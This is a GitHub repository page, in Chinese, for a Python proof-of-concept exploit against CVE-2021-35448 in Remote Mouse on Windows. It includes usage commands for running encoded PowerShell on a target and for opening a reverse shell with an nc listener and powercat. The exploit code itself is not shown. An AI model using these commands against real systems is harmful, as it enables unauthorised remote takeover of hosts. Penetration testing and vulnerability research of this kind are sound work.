Goultarde/RemoteMouse-3.008-RCE

GitHub: Goultarde/RemoteMouse-3.008-RCE

针对 Remote Mouse 应用 CVE-2021-35448 远程代码执行漏洞的 Python 概念验证与利用脚本。

Stars: 0 | Forks: 0

# CVE-2021-35448 - Remote Mouse 漏洞利用 ## 描述 此漏洞利用针对 Remote Mouse 应用程序(原 WiFi Mouse)中的 **CVE-2021-35448** 漏洞。 # POC [CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61) ## 使用方法 ### 基本语法 ``` python3 CVE-2021-35448.py -t [OPTIONS] ``` ### 选项 - `-t, --target`:目标 IP 地址(必填) - `-p, --payload`:要执行的自定义命令 - `-r, --reverse`:格式为 IP:PORT 的反弹 shell - `-l, --http`:格式为 IP:PORT 的本地 HTTP 服务器(与 -r 一起使用时必填) ### 使用示例 #### 1. 自定义命令 ``` python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...==" ``` #### 2. 反弹 Shell(推荐) ``` # Terminal 1 - 监听器 nc -nlvp 4444 # Terminal 2 - Exploit python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT ``` ## 前置条件 ### 所需文件 - `CVE-2021-35448.py`:主漏洞利用脚本 - `powercat.ps1`:用于反弹 shell 的 PowerShell 脚本 ### 目标系统 - 已安装并正在运行 Remote Mouse - Windows 系统(已在 Windows 10 上测试) ## 警告 ⚠️ **仅供道德使用** ⚠️ 此工具仅供教育目的和授权的渗透测试使用。未经授权使用此漏洞利用是非法的,并可能导致法律起诉。 ## 参考 - [WiFi Mouse 1.7.8.5 - 远程代码执行](https://www.exploit-db.com/exploits/49601) - [CVE-2021-35448 详情](https://nvd.nist.gov/vuln/detail/CVE-2021-35448) ## 作者 为教育和道德渗透测试目的而开发。 *最后更新:2025*
标签:AI合规, Libemu, OpenCanary, Python, 威胁模拟, 安全, 无后门, 编程工具, 超时处理, 远程代码执行, 逆向工具